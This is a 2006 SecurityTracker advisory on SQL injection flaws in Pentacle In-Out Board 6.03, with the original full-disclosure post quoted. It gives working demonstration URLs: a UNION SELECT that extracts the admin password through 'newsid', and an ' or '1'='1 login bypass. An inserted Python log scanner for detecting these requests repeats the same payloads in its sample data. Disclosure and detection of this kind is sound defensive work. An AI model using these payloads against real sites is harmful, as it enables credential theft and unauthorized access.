SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   Pentacle In-Out Board
Vendors:   G2Soft.Net
Pentacle In-Out Board Input Validation Bugs in 'newsdetailsview.asp' and 'login.asp' Permit SQL Injection
SecurityTracker Alert ID:  1015682
SecurityTracker URL:  http://securitytracker.com/id/1015682
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 25 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 6.03
Description:   A vulnerability was reported in Pentacle In-Out Board. A remote user can inject SQL commands. A remote user can bypass authentication.

The 'newsdetailsview.asp' script does not properly validate user-supplied input in the 'newsid' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

http://[target]/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes

The 'login.asp' script is also vulnerable. A remote user can exploit this to bypass authentication. A demonstration exploit URL is provided:

http://[site]/[ptdir]/login.asp?username=any&password=' or '1'='1

The vendor was notified on February 25, 2006.

Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI reported this vulnerability.

The original advisories are available at:

http://www.nukedx.com/?viewdoc=13
http://www.nukedx.com/?viewdoc=14

Impact:   A remote user can execute SQL commands on the underlying database. This can be exploited to bypass authentication.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.g2soft.net/
Cause:   Input validation error
Underlying OS:  Windows (Any)
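
With no vendor fix available, one interim control is to screen requests for the two parameters named in the description. The following is an added example, not part of the advisory or the vendor's code: it flags a non-integer `newsid` on newsdetailsview.asp and a quote character in the login.asp `username` or `password`. The log line format, the `/board/` path, the integer-only assumption for `newsid` and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines (method, URL, status); "/board/" stands in for [ptdir].
SAMPLE_LOG = [
    "GET /board/newsdetailsview.asp?newsid=11 200",
    "GET /board/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword"
    "%20from%20pt_users 200",
    "GET /board/login.asp?username=alice&password=s3cret 302",
    "GET /board/login.asp?username=any&password='%20or%20'1'='1 302",
    "GET /board/default.asp?page=2 200",
]

# Assumption: a legitimate newsid is a short run of decimal digits.
INT_RE = re.compile(r"[0-9]{1,10}")

def check_request(url):
    """Return (rule, decoded_value) findings for one request URL; empty if clean."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes each value, so encoded payloads are compared decoded.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if script == "newsdetailsview.asp":
        for value in params.get("newsid", []):
            if not INT_RE.fullmatch(value):
                findings.append(("newsid-not-integer", value))
    elif script == "login.asp":
        # A quote can also occur in a legitimate password, so treat hits as leads.
        for name in ("username", "password"):
            for value in params.get(name, []):
                if "'" in value:
                    findings.append((name + "-contains-quote", value))
    return findings

def scan(lines):
    """Return (line_number, rule, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 2:
            continue  # not a request line in the assumed format
        for rule, value in check_request(fields[1]):
            hits.append((number, rule, value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allow-list test on `newsid` can be applied in front of the application, for example in a request filter, to reject the request rather than only report it.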

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Advisory: Pentacle In-Out Board <= 6.03

--Security Report--
Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL
Injection Vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 25/02/06 06:08 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: G2SOFT (www.g2soft.net)
Version: 6.03 and prior versions must be affected.
About: Via this method a remote attacker can inject an arbitrary SQL query into
newsdetailsview.asp.
Level: Critical
---
How&Example:
GET -> http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20[SQLCode]
EXAMPLE ->
http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes
With this example a remote attacker could get the admin's username and password.
--
Timeline:
* 25/02/2006: Vulnerability found.
* 25/02/2006: Contacted the vendor and waiting for a reply.
--
Exploit:
http://www.nukedx.com/?getxpl=14
--
Original advisory: http://www.nukedx.com/?viewdoc=14
